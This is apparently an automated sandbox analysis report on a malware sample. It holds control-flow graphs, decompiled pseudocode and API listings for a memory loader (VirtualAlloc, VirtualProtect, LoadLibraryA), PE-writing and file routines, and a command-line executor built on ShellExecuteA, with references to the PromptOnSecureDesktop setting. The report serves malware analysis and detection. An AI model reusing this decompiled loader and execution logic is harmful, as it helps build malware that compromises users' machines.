                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 640 ad003c-ad0047 641 ad004c-ad0263 call ad0a3f call ad0e0f call ad0d90 VirtualAlloc 640->641 642 ad0049 640->642 657 ad028b-ad0292 641->657 658 ad0265-ad0289 call ad0a69 641->658 642->641 660 ad02a1-ad02b0 657->660 661 ad02ce-ad03c2 VirtualProtect call ad0cce call ad0ce7 658->661 660->661 662 ad02b2-ad02cc 660->662 669 ad03d1-ad03e0 661->669 662->660 670 ad0439-ad04b8 VirtualFree 669->670 671 ad03e2-ad0437 call ad0ce7 669->671 673 ad04be-ad04cd 670->673 674 ad05f4-ad05fe 670->674 671->669 676 ad04d3-ad04dd 673->676 677 ad077f-ad0789 674->677 678 ad0604-ad060d 674->678 676->674 683 ad04e3-ad0505 LoadLibraryA 676->683 681 ad078b-ad07a3 677->681 682 ad07a6-ad07b0 677->682 678->677 679 ad0613-ad0637 678->679 684 ad063e-ad0648 679->684 681->682 685 ad086e-ad08be LoadLibraryA 682->685 686 ad07b6-ad07cb 682->686 687 ad0517-ad0520 683->687 688 ad0507-ad0515 683->688 684->677 691 ad064e-ad065a 684->691 696 ad08c7-ad08f9 685->696 689 ad07d2-ad07d5 686->689 690 ad0526-ad0547 687->690 688->690 692 ad0824-ad0833 689->692 693 ad07d7-ad07e0 689->693 694 ad054d-ad0550 690->694 691->677 695 ad0660-ad066a 691->695 702 ad0839-ad083c 692->702 697 ad07e4-ad0822 693->697 698 ad07e2 693->698 699 ad0556-ad056b 694->699 700 ad05e0-ad05ef 694->700 701 ad067a-ad0689 695->701 703 ad08fb-ad0901 696->703 704 ad0902-ad091d 696->704 697->689 698->692 705 ad056d 699->705 706 ad056f-ad057a 699->706 700->676 707 ad068f-ad06b2 701->707 708 ad0750-ad077a 701->708 702->685 709 ad083e-ad0847 702->709 703->704 705->700 711 ad057c-ad0599 706->711 712 ad059b-ad05bb 706->712 713 ad06ef-ad06fc 707->713 714 ad06b4-ad06ed 707->714 708->684 715 ad0849 709->715 716 ad084b-ad086c 709->716 723 ad05bd-ad05db 711->723 712->723 717 ad06fe-ad0748 713->717 718 ad074b 713->718 714->713 715->685 716->702 717->718 718->701 723->694
                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 00AD024D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID: cess$kernel32.dll
                                                                                                                                  • API String ID: 4275171209-1230238691
                                                                                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                  • Instruction ID: f99b96d0982748643ea66c72dc06caae63c068747a6799b1f271543d39d051be
                                                                                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                  • Instruction Fuzzy Hash: AC525974A012299FDB64CF58C985BACBBB1BF09304F1480DAE94DAB351DB30AE95DF14
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 004099D2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54stringCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  C-Code - Quality: 46%
                                                                                                                                  			E004099D2(int __edx, void* __eflags, CHAR* _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16, int _a20) {
				signed int _t14;
				void* _t21;
				CHAR* _t22;
				void* _t24;
				int _t25;

				_t25 = __edx;
				_t22 = _a8;
				lstrcpyA(_t22, _a4);
				E00408274(_t22);
				_push(0);
				_push(_a12);
				_t14 = E00406C6F((E0040ECA5() & 0x0000000f) << 0x00000014 | 0x00005e0d);
				_pop(_t24);
				_push(_t14 ^ 0x5e5e5e5e);
				E0040F133();
				lstrcatA(_a12, E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8));
				E0040EE2A(_t24, 0x4122f8, 0, 0x100);
				lstrcatA(_t22, _a12);
				_t21 = E00406A60(_t25, _t22, _a16, _a20); // executed
				return _t21;
			}








                                                                                                                                  0x004099d2
                                                                                                                                  0x004099d6
                                                                                                                                  0x004099df
                                                                                                                                  0x004099e6
                                                                                                                                  0x004099ec
                                                                                                                                  0x004099ee
                                                                                                                                  0x00409a02
                                                                                                                                  0x00409a07
                                                                                                                                  0x00409a0d
                                                                                                                                  0x00409a0e
                                                                                                                                  0x00409a3c
                                                                                                                                  0x00409a46
                                                                                                                                  0x00409a52
                                                                                                                                  0x00409a5b
                                                                                                                                  0x00409a67

                                                                                                                                  APIs
                                                                                                                                  • lstrcpyA.KERNEL32(?,?,00000100,PromptOnSecureDesktop,00000000,?,00409E9D,?,00000022,?,?,?,?,?,?,?), ref: 004099DF
                                                                                                                                  • lstrcatA.KERNEL32(00000022,00000000,?,?,00409E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 00409A3C
                                                                                                                                  • lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,00409E9D,?,00000022,?,?,?), ref: 00409A52
                                                                                                                                    • Part of subcall function 00406A60: CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,761F81D0,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406A7D
                                                                                                                                    • Part of subcall function 00406A60: GetDiskFreeSpaceA.KERNELBASE(00409E9D,00409A60,?,?,?,PromptOnSecureDesktop,?,?,?,00409A60,?,?,00409E9D), ref: 00406ABB
                                                                                                                                    • Part of subcall function 00406A60: GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B40
                                                                                                                                    • Part of subcall function 00406A60: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B4E
                                                                                                                                    • Part of subcall function 00406A60: DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B80
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Filelstrcat$CloseCreateDeleteDiskErrorFreeHandleLastSpacelstrcpy
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 4131120076-2980165447
                                                                                                                                  • Opcode ID: db0254336d7d464b5d9db0b354e918c6608a6464c5c4443ee0d461099338c0f8
                                                                                                                                  • Instruction ID: bdd0e4aeb617a5e371eea751ca6e82beed5a5e384e9917b0f8373ebabf2fcd57
                                                                                                                                  • Opcode Fuzzy Hash: db0254336d7d464b5d9db0b354e918c6608a6464c5c4443ee0d461099338c0f8
                                                                                                                                  • Instruction Fuzzy Hash: 8D01A27294020877EA103F62EC47F9F3F1DEB44718F00483AF619790D2D9BA95709AAC
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00404000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35sleepfileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 739 404000-404008 740 40400b-40402a CreateFileA 739->740 741 404057 740->741 742 40402c-404035 GetLastError 740->742 745 404059-40405c 741->745 743 404052 742->743 744 404037-40403a 742->744 747 404054-404056 743->747 744->743 746 40403c-40403f 744->746 745->747 746->745 748 404041-404050 Sleep 746->748 748->740 748->743
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00404000(CHAR* _a4, signed int* _a8) {
				void* _t3;
				long _t6;
				void* _t8;
				signed int* _t9;

				_t9 = _a8;
				_t8 = 0;
				 *_t9 =  *_t9 | 0xffffffff;
				while(1) {
					_t3 = CreateFileA(_a4, 0xc0000000, 3, 0, 3, 0x40000080, 0); // executed
					if(_t3 != 0xffffffff) {
						break;
					}
					_t6 = GetLastError();
					if(_t6 == 2 || _t6 == 3) {
						L6:
						return 0;
					} else {
						if(_t6 == 5) {
							L9:
							return 1;
						}
						Sleep(0x1f4);
						_t8 = _t8 + 1;
						if(_t8 < 0xa) {
							continue;
						}
						goto L6;
					}
				}
				 *_t9 = _t3;
				goto L9;
			}







                                                                                                                                  0x00404001
                                                                                                                                  0x00404006
                                                                                                                                  0x00404008
                                                                                                                                  0x0040400b
                                                                                                                                  0x00404021
                                                                                                                                  0x0040402a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040402c
                                                                                                                                  0x00404035
                                                                                                                                  0x00404052
                                                                                                                                  0x00000000
                                                                                                                                  0x0040403c
                                                                                                                                  0x0040403f
                                                                                                                                  0x00404059
                                                                                                                                  0x00000000
                                                                                                                                  0x0040405b
                                                                                                                                  0x00404046
                                                                                                                                  0x0040404c
                                                                                                                                  0x00404050
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00404050
                                                                                                                                  0x00404035
                                                                                                                                  0x00404057
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • CreateFileA.KERNELBASE(40000080,C0000000,00000003,00000000,00000003,40000080,00000000,00000001,PromptOnSecureDesktop,004042B6,00000000,00000001,PromptOnSecureDesktop,00000000,?,004098FD), ref: 00404021
                                                                                                                                  • GetLastError.KERNEL32(?,004098FD,00000001,00000100,PromptOnSecureDesktop,0040A3C7), ref: 0040402C
                                                                                                                                  • Sleep.KERNEL32(000001F4,?,004098FD,00000001,00000100,PromptOnSecureDesktop,0040A3C7), ref: 00404046
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateErrorFileLastSleep
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 408151869-2980165447
                                                                                                                                  • Opcode ID: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
                                                                                                                                  • Instruction ID: 3804347f6bd7ba573f3b83e06e35dce69dd086f5e0a34025cfebbc3953b0dfe0
                                                                                                                                  • Opcode Fuzzy Hash: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
                                                                                                                                  • Instruction Fuzzy Hash: 05F0A771240101AAD7311B24BC49B5B36A1DBC6734F258B76F3B5F21E0C67458C19B1D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00406987 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92fileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 751 406987-4069b7 752 4069e0 751->752 753 4069b9-4069be 751->753 755 4069e4-4069fd WriteFile 752->755 753->752 754 4069c0-4069d0 753->754 758 4069d2 754->758 759 4069d5-4069de 754->759 756 406a4d-406a51 755->756 757 4069ff-406a02 755->757 761 406a53-406a56 756->761 762 406a59 756->762 757->756 760 406a04-406a08 757->760 758->759 759->755 763 406a0a-406a0d 760->763 764 406a3c-406a3e 760->764 761->762 765 406a5b-406a5f 762->765 766 406a10-406a2e WriteFile 763->766 764->765 767 406a40-406a4b 766->767 768 406a30-406a33 766->768 767->765 768->767 769 406a35-406a3a 768->769 769->764 769->766
                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                  			E00406987(void* __ecx, void* _a4, void* _a8, intOrPtr _a12, signed int _a16) {
				long _v8;
				long _v12;
				signed int _t50;
				int _t52;
				signed int _t53;
				int _t59;
				signed int _t60;
				long _t68;
				signed int _t74;
				void* _t78;
				void* _t85;

				_t78 = _a8;
				_t48 =  *((intOrPtr*)(_t78 + 0x3c)) + _t78;
				_t7 =  &_a16; // 0x406b2c
				_t85 = (( *( *((intOrPtr*)(_t78 + 0x3c)) + _t78 + 6) & 0x0000ffff) - 1) * 0x28 + ( *(_t48 + 0x14) & 0x0000ffff) + _t48 + 0x18;
				_t68 =  *(_t85 + 0x14);
				_t50 =  *_t7 - _t68;
				_v8 = _t50;
				if(_t68 >= _a12) {
					L5:
					_a16 = _a16 & 0x00000000;
				} else {
					_t74 =  *(_t85 + 0x10);
					if(_t74 == 0) {
						goto L5;
					} else {
						_v12 = _t74;
						_a16 = _t50 / _t74;
						if(_a16 < 1) {
							_a16 = 1;
						}
						_t20 =  &_a16; // 0x406b2c
						 *(_t85 + 0x10) =  *_t20 * _t74;
					}
				}
				_v8 = _v8 & 0x00000000;
				_t52 = WriteFile(_a4, _t78, _t68,  &_v8, 0); // executed
				if(_t52 == 0 || _v8 != _t68) {
					if(_a16 != 0) {
						 *(_t85 + 0x10) = _v12;
					}
					_t53 = 0;
				} else {
					if(_a16 == 0) {
						L13:
						_t53 = _t68;
					} else {
						 *(_t85 + 0x10) = _v12;
						while(1) {
							_v8 = _v8 & 0x00000000;
							_t59 = WriteFile(_a4, _a8 +  *(_t85 + 0x14), _v12,  &_v8, 0); // executed
							_t60 = _v8;
							if(_t59 == 0 || _t60 != _v12) {
								break;
							}
							_t68 = _t68 + _t60;
							_t41 =  &_a16;
							 *_t41 = _a16 - 1;
							if( *_t41 != 0) {
								continue;
							} else {
								goto L13;
							}
							goto L18;
						}
						asm("sbb eax, eax");
						_t53 =  !_t60 & _t68 + _t60;
					}
				}
				L18:
				return _t53;
			}














                                                                                                                                  0x0040698f
                                                                                                                                  0x00406995
                                                                                                                                  0x004069a7
                                                                                                                                  0x004069aa
                                                                                                                                  0x004069ac
                                                                                                                                  0x004069af
                                                                                                                                  0x004069b1
                                                                                                                                  0x004069b7
                                                                                                                                  0x004069e0
                                                                                                                                  0x004069e0
                                                                                                                                  0x004069b9
                                                                                                                                  0x004069b9
                                                                                                                                  0x004069be
                                                                                                                                  0x00000000
                                                                                                                                  0x004069c0
                                                                                                                                  0x004069c4
                                                                                                                                  0x004069c7
                                                                                                                                  0x004069d0
                                                                                                                                  0x004069d2
                                                                                                                                  0x004069d2
                                                                                                                                  0x004069d5
                                                                                                                                  0x004069db
                                                                                                                                  0x004069db
                                                                                                                                  0x004069be
                                                                                                                                  0x004069e4
                                                                                                                                  0x004069f9
                                                                                                                                  0x004069fd
                                                                                                                                  0x00406a51
                                                                                                                                  0x00406a56
                                                                                                                                  0x00406a56
                                                                                                                                  0x00406a59
                                                                                                                                  0x00406a04
                                                                                                                                  0x00406a08
                                                                                                                                  0x00406a3c
                                                                                                                                  0x00406a3c
                                                                                                                                  0x00406a0a
                                                                                                                                  0x00406a0d
                                                                                                                                  0x00406a10
                                                                                                                                  0x00406a10
                                                                                                                                  0x00406a27
                                                                                                                                  0x00406a2b
                                                                                                                                  0x00406a2e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00406a35
                                                                                                                                  0x00406a37
                                                                                                                                  0x00406a37
                                                                                                                                  0x00406a3a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00406a3a
                                                                                                                                  0x00406a45
                                                                                                                                  0x00406a49
                                                                                                                                  0x00406a49
                                                                                                                                  0x00406a08
                                                                                                                                  0x00406a5b
                                                                                                                                  0x00406a5f

                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNELBASE(00409A60,?,?,00000000,00000000,00409A60,?,00000000), ref: 004069F9
                                                                                                                                  • WriteFile.KERNELBASE(00409A60,?,00409A60,00000000,00000000), ref: 00406A27
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite
                                                                                                                                  • String ID: ,k@
                                                                                                                                  • API String ID: 3934441357-1053005162
                                                                                                                                  • Opcode ID: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
                                                                                                                                  • Instruction ID: 2e4882fff751b5905bcc38bfa2cd4d67bf9c642b42fdf425c00f27fbfd993b21
                                                                                                                                  • Opcode Fuzzy Hash: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
                                                                                                                                  • Instruction Fuzzy Hash: 3A313A72A00209EFDB24DF58D984BAA77F4EB44315F12847AE802F7680D374EE64CB65
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00416930 Relevance: 3.3, APIs: 2, Instructions: 326COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 800 416930-41697d 802 4169ab-4169bb call 40c125 800->802 803 4169c0-4169ca 802->803 804 4169d4-4169e7 803->804 805 4169cc-4169cf 803->805 807 4169f2-4169ff 804->807 806 416dba-416dcb 805->806 808 416a01-416a5d 807->808 809 416a5f-416a65 807->809 808->807 811 416c63-416c79 809->811 812 416a6b-416a6f 809->812 815 416dab-416db8 811->815 816 416c7f-416c94 811->816 812->811 814 416a75-416a96 812->814 817 416aa3 814->817 818 416a98-416aa1 814->818 815->806 819 416ca2-416cad 816->819 820 416c96-416c9c 816->820 821 416aad-416abd 817->821 818->821 824 416cbb-416cc8 819->824 825 416caf-416cb9 819->825 820->819 823 416d94-416da3 820->823 826 416ac8-416ad1 821->826 830 416da6 823->830 827 416cce-416ce2 824->827 825->827 828 416b93-416b9a 826->828 829 416ad7-416af6 826->829 837 416d79-416d8c 827->837 838 416ce8-416cec 827->838 831 416bb7-416bbd 828->831 839 416b05-416b1f 829->839 840 416af8-416b00 829->840 830->815 831->811 832 416bc3-416bc9 831->832 835 416bcf-416bd5 832->835 836 416c5e 832->836 835->836 842 416bdb-416be4 835->842 836->831 843 416d92 837->843 838->837 844 416cf2-416d03 838->844 845 416b2a-416b3c 839->845 840->828 842->836 848 416be6-416bef 842->848 843->830 844->837 854 416d05-416d19 844->854 846 416b8e 845->846 847 416b3e-416b8c 845->847 846->826 847->845 851 416c01-416c45 call 41bc00 848->851 852 416bf1-416bff 848->852 862 416c47-416c4a 851->862 863 416c4f-416c5b 851->863 852->836 852->851 856 416d1b-416d2b 854->856 857 416d2d-416d39 854->857 860 416d4b-416d61 call 41bc00 856->860 857->860 861 416d3b-416d48 857->861 866 416d63-416d66 860->866 867 416d68-416d77 860->867 861->860 862->806 863->836 866->806 867->843
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b5666b7de09cf01aae8cce74cc5509ea24d439d8651653c25499f854a2baff1a
                                                                                                                                  • Instruction ID: 09d6e81fcf76da4e43cf60b9f69bcbf2c181d9feaad62054433ac42e5f9b529a
                                                                                                                                  • Opcode Fuzzy Hash: b5666b7de09cf01aae8cce74cc5509ea24d439d8651653c25499f854a2baff1a
                                                                                                                                  • Instruction Fuzzy Hash: 7BE10B74E04248CFDB24CFA8C894BADBBB1FB49314F25825ED8656B392D7359882CF45
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 004091EB Relevance: 3.1, APIs: 2, Instructions: 119sleepCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 869 4091eb-409208 870 409308 869->870 871 40920e-40921c call 40ed03 869->871 872 40930b-40930f 870->872 875 40921e-40922c call 40ed03 871->875 876 40923f-409249 871->876 875->876 882 40922e-409230 875->882 878 409250-409270 call 40ee08 876->878 879 40924b 876->879 885 409272-40927f 878->885 886 4092dd-4092e1 878->886 879->878 884 409233-409238 882->884 884->884 887 40923a-40923c 884->887 888 409281-409285 885->888 889 40929b-40929e 885->889 890 4092e3-4092e5 886->890 891 4092e7-4092e8 886->891 887->876 888->888 894 409287 888->894 892 4092a0 889->892 893 40928e-409293 889->893 890->891 895 4092ea-4092ef 890->895 891->886 900 4092a8-4092ab 892->900 896 409295-409298 893->896 897 409289-40928c 893->897 894->889 898 4092f1-4092f6 Sleep 895->898 899 4092fc-409302 895->899 896->900 901 40929a 896->901 897->893 897->901 898->899 899->870 899->871 902 4092a2-4092a5 900->902 903 4092ad-4092b0 900->903 901->889 904 4092b2 902->904 905 4092a7 902->905 903->904 906 4092bd 903->906 907 4092b5-4092b9 904->907 905->900 908 4092bf-4092db ShellExecuteA 906->908 907->907 909 4092bb 907->909 908->886 910 409310-409324 908->910 909->908 910->872
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E004091EB(char* _a4, char* _a8) {
				signed int _v8;
				signed int _v12;
				char _v524;
				char _t24;
				char* _t25;
				void* _t27;
				intOrPtr* _t29;
				char* _t31;
				char _t34;
				intOrPtr _t40;
				void* _t41;
				char* _t42;
				void* _t44;
				void* _t45;
				void* _t46;

				_v12 = _v12 & 0x00000000;
				_t42 = _a8;
				_v8 = 0x10;
				if( *_t42 == 0) {
					L33:
					return _v12;
				} else {
					goto L1;
				}
				do {
					L1:
					_t31 = E0040ED03(_t42, 0xd);
					if(_t31 != 0) {
						L6:
						_t44 = _t31 - _t42;
						if(_t44 >= 0x200) {
							_t44 = 0x1ff;
						}
						E0040EE08( &_v524, _t42, _t44);
						_t46 = _t46 + 0xc;
						 *((char*)(_t45 + _t44 - 0x208)) = 0;
						if(_v524 == 0) {
							goto L27;
						} else {
							_t25 =  &_v524;
							if(_v524 != 0x20) {
								L16:
								while( *_t25 == 0x22) {
									while(1) {
										_t25 =  &(_t25[1]);
										_t34 =  *_t25;
										if(_t34 == 0) {
											break;
										}
										if(_t34 == 0x22) {
											L15:
											_t25 =  &(_t25[1]);
											goto L16;
										}
									}
									if(_t34 != 0x22) {
										L20:
										while( *_t25 != 0) {
											if( *_t25 == 0x20) {
												L22:
												 *_t25 = 0;
												do {
													_t25 =  &(_t25[1]);
												} while ( *_t25 == 0x20);
												L26:
												_t27 = ShellExecuteA(0, _a4,  &_v524, _t25, 0, 0); // executed
												_v12 = _t27;
												if(_t27 != 0x2a) {
													 *0x412180 = _v8 | 0x5e0d0100;
													 *0x41217c = _t27;
													return _t27;
												} else {
													goto L27;
												}
												while(1) {
													L27:
													_t24 =  *_t31;
													if(_t24 != 0xd && _t24 != 0xa) {
														goto L30;
													}
													_t31 = _t31 + 1;
												}
												goto L30;
											}
											_t25 =  &(_t25[1]);
										}
										if( *_t25 != 0x20) {
											_t25 = 0;
											goto L26;
										}
										goto L22;
									}
									goto L15;
								}
								goto L20;
							} else {
								goto L10;
							}
							do {
								L10:
								_t25 =  &(_t25[1]);
							} while ( *_t25 == 0x20);
							goto L16;
						}
					}
					_t31 = E0040ED03(_t42, 0xa);
					if(_t31 != 0) {
						goto L6;
					}
					_t29 = _t42;
					_t5 = _t29 + 1; // 0x409689
					_t41 = _t5;
					do {
						_t40 =  *_t29;
						_t29 = _t29 + 1;
					} while (_t40 != 0);
					_t31 = _t29 - _t41 + _t42;
					goto L6;
					L30:
					_t42 = _t31;
					if( *_t31 != 0) {
						Sleep(0x1f4); // executed
					}
					_v8 = _v8 + 1;
				} while ( *_t31 != 0);
				goto L33;
			}


















                                                                                                                                  0x004091f4
                                                                                                                                  0x004091fb
                                                                                                                                  0x00409201
                                                                                                                                  0x00409208
                                                                                                                                  0x00409308
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040920e
                                                                                                                                  0x0040920e
                                                                                                                                  0x00409216
                                                                                                                                  0x0040921c
                                                                                                                                  0x0040923f
                                                                                                                                  0x00409241
                                                                                                                                  0x00409249
                                                                                                                                  0x0040924b
                                                                                                                                  0x0040924b
                                                                                                                                  0x00409259
                                                                                                                                  0x0040925e
                                                                                                                                  0x00409261
                                                                                                                                  0x00409270
                                                                                                                                  0x00000000
                                                                                                                                  0x00409272
                                                                                                                                  0x00409279
                                                                                                                                  0x0040927f
                                                                                                                                  0x00000000
                                                                                                                                  0x0040929b
                                                                                                                                  0x0040928e
                                                                                                                                  0x0040928e
                                                                                                                                  0x0040928f
                                                                                                                                  0x00409293
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040928c
                                                                                                                                  0x0040929a
                                                                                                                                  0x0040929a
                                                                                                                                  0x00000000
                                                                                                                                  0x0040929a
                                                                                                                                  0x0040928c
                                                                                                                                  0x00409298
                                                                                                                                  0x00000000
                                                                                                                                  0x004092a8
                                                                                                                                  0x004092a5
                                                                                                                                  0x004092b2
                                                                                                                                  0x004092b2
                                                                                                                                  0x004092b5
                                                                                                                                  0x004092b5
                                                                                                                                  0x004092b6
                                                                                                                                  0x004092bf
                                                                                                                                  0x004092cf
                                                                                                                                  0x004092d5
                                                                                                                                  0x004092db
                                                                                                                                  0x00409319
                                                                                                                                  0x0040931f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004092dd
                                                                                                                                  0x004092dd
                                                                                                                                  0x004092dd
                                                                                                                                  0x004092e1
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004092e7
                                                                                                                                  0x004092e7
                                                                                                                                  0x00000000
                                                                                                                                  0x004092dd
                                                                                                                                  0x004092a7
                                                                                                                                  0x004092a7
                                                                                                                                  0x004092b0
                                                                                                                                  0x004092bd
                                                                                                                                  0x00000000
                                                                                                                                  0x004092bd
                                                                                                                                  0x00000000
                                                                                                                                  0x004092b0
                                                                                                                                  0x00000000
                                                                                                                                  0x00409298
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00409281
                                                                                                                                  0x00409281
                                                                                                                                  0x00409281
                                                                                                                                  0x00409282
                                                                                                                                  0x00000000
                                                                                                                                  0x00409287
                                                                                                                                  0x00409270
                                                                                                                                  0x00409226
                                                                                                                                  0x0040922c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040922e
                                                                                                                                  0x00409230
                                                                                                                                  0x00409230
                                                                                                                                  0x00409233
                                                                                                                                  0x00409233
                                                                                                                                  0x00409235
                                                                                                                                  0x00409236
                                                                                                                                  0x0040923c
                                                                                                                                  0x00000000
                                                                                                                                  0x004092ea
                                                                                                                                  0x004092ed
                                                                                                                                  0x004092ef
                                                                                                                                  0x004092f6
                                                                                                                                  0x004092f6
                                                                                                                                  0x004092fc
                                                                                                                                  0x004092ff
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • ShellExecuteA.SHELL32(00000000,00000000,00000020,00000023,00000000,00000000), ref: 004092CF
                                                                                                                                  • Sleep.KERNELBASE(000001F4,00000000,00000000,000000C8), ref: 004092F6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExecuteShellSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4194306370-0
                                                                                                                                  • Opcode ID: f04ce0a36b1e0340726d5e5c72fce4fe20aaa33147c233af0dd5a9c46ca05612
                                                                                                                                  • Instruction ID: 91eefd9640bbaae20ce027590a47b9066bf8b1017d1ec6fca77516d99313e2d1
